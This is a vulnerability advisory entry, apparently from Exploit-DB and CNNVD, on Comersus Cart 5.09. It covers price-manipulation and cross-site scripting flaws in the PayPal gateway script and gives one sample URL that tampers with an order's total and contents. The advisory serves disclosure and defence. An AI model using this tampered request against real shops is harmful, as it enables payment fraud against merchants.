https://www.exploit-db.com/exploits/24260
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200408-075

ComersusCart是一款基于ASP的电子购物程序。ComersusCart不正确处理和过滤用户提交的请求，远程攻击者可以利用这些漏洞更改价格或获得用户敏感信息。第一个问题是’comersus_gatewayPayPal.asp’脚本不正确处理用户提交的请求，攻击者可更改参数使定单在提交给PayPal前更改。第二个问题是多个脚本对用户提交的数据缺少过滤，用户可提交恶意HTML代码，当其他用户浏览器时可导致敏感信息(如用于验证的COOKIE信息)泄露。

source: http://www.securityfocus.com/bid/10674/info

Comersus Cart is reported prone to multiple vulnerabilities. These issues may allow a remote attacker to carry out cross-site scripting attacks and manipulate parameters to change the price of an order.

Comersus Cart version 5.09 is affected by these issues, however, other versions may be prone to these vulnerabilities as well.

http://www.example.com/comersus/store/comersus_gatewayPayPal.asp?idOrder=2002&OrderTotal=|102|222|228|22|130|36|209&name=Thomas&lastName=Ryan&address=123+Easy+Modify+Street&city=New+York&state=NY&zip=10001&country=US&phone=212%2D857%2D1731&email=tommy%40providesecurity%2Ecom&orderDetails=1x+%23RDHT%2F11+Red+Hat+Deluxe+WorkStation+Options%3A+%3D+%2479%2E00%0D%0A2x+%23WME%2F1+Windows+Millennium+Edition+Options%3A+%3D+%24398%2E00%0D%0A1x+%23BPRES2%2F6+So+You+Want+to+Be+President%3F+Options%3A+%3D+%2414%2E39%0D%0A

来源:XF
名称:comersus-cart-price-modification(16645)
链接:http://xforce.iss.net/xforce/xfdb/16645
来源:BID
名称:10674
链接:http://www.securityfocus.com/bid/10674
来源:BUGTRAQ
名称:20040707ComersusCartImproperRequestHandling
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108922336529987&w;=2